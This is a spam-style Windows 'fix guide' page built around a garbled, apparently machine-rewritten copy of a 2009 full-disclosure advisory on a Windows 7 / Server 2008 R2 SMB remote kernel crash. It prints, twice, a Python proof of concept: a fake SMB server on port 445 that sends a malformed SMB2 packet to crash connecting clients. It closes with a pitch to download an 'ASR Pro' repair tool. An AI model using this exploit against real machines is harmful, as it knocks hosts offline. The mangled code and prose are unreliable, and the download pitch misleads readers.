Table of Contents
Approved
If Windows 7 / Server 2008r2 Remote Kernel is crashing on your computer, we hope this user guide can help you fix the problem. g.Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: It exploits a failure to perform operations in the Microsoft Windows SMB client on Windows 7 plus Windows Server 2008 R2. It mostly fails the remote kernel. The Metasploit Framework contains a module to exploit my vulnerability.
g.
#! / usr / bin / python# win7-crash.Trigger py:# remote kernel crash on host server Win7 and 2008R2 (infinite loop)# KeAccumulateTicks () crashes due to NT_ASSERT () / DbgRaiseAssertionFailure () caused by powerful# Endless cycle.# NO BSOD, YOU MUST DISCONNECT THE CONNECTOR.# To call it quickly; in order: this_script_ip_addr BLAH, crash effortlessly# Author: Laurent Gaffi¯ ¿ ½Import Socket ServerPackage = (" x00 x00 x00 x9a" number length ---> must be 9th, not 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41"" xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00"" x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01 "" xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20"" x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e"" x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a")SMB2 class (SocketServer.BaseRequestHandler): Def-Handle (herself): print "Who:", self.client_address Use "THANKS SDL" The entry implies self.request.recv (1024) self.request.send (package) self.request.close ()launch = SocketServer.TCPServer (('', 445), SMB2) # listen on all interfaces city 445launch.serve_forever ()
This error is important evidence that SDL FAIL
The target of the error is an infinite loop on smb1,2, pre-authentication, just no credentials required …
Can be launched on local network via (IE *)
The error is likely to be so simple that it should have been discovered 2 years ago by a specific SDL if the SDL already existed:
netbios_header = struct.pack (“> i”, len (”. join (SMB_packet)) + SMB_packet
(The netbios h2 tags indicate the length of the new smb1,2 packet.)
If the netbios_header number is 4 bytes less or more than SMB_packet, the situation is simply violated!
WHAT KIND ?? Are you kidding me where is my SDL?!?
“The safest operating system on the light. е “;
That your correct firewall is configured should be removed via IE, even with nbns broadcast method (no user interaction)
================================================
– Release date: November 11, 2009
– Discovered by: Laurent Gaffier
– Severity: medium / high
==============================================
NS. CONFIRMATION OF THE CONCEPT
————————–
# win7-crash.py:
# Running a real remote kernel crash under Win7 and therefore Server 2008R2 (infinite loop)
# KeAccumulateTicks () crashed due to NT_ASSERT () / DbgRaiseAssertionFailure () caused by # strong infinite loop.
# NO BSOD, YOU HAVE A CORK.
# To call it quickly; in order: this_script_ip_addr BLAH, decrease immediately
# Posted by Laurent Gaffier
#
Package = (number ” x00 x00 x00 x9a” —> 9th length should really be 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)
V. COMMERCIAL IMPACT
————————–
An attacker can remotely disable any Windows 2008R2 server 7 /
on the local network or via IE
Vii. Patch solution
————————–
is not available for this instance, your ISP doesn’t care.
Close SMB function and ports until valid audit is provided.
X. HISTORY OF CHANGES
————————–
November 8, 2009: MSRC contacted
November 8, 2009: MSRC Discovered Vulnerability
Nov 11, 2009: MRSC is trying to convince me because there is an IPv6 bug from various vendors that should not appear in security bulletins.
November 11, 2009: This valuable bug has been released.
XI. NOTES
————————–
The legal information contained in this notice is provided “as is”
without representations or guarantees of expediencyor otherwise.
I do not accept any damage caused by the operator or
Misuse of this information.
Full disclosureMailing List Archives
Remote kernel failure Windows 7 Server 2008R2
________________________________________________GenderMy disclosure of information - trust right now.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlJust posted and sponsored by Secunia Http: // secunia-.com/
By date By Wire
Current stream:
- Windows Server 2008R2 Powerful Remote Kernel Crash by Laurent Gaffy (Nov 11)
Approved
The ASR Pro repair tool is the solution for a Windows PC that's running slowly, has registry issues, or is infected with malware. This powerful and easy-to-use tool can quickly diagnose and fix your PC, increasing performance, optimizing memory, and improving security in the process. Don't suffer from a sluggish computer any longer - try ASR Pro today!
The software to fix your PC is just a click away - download it now.
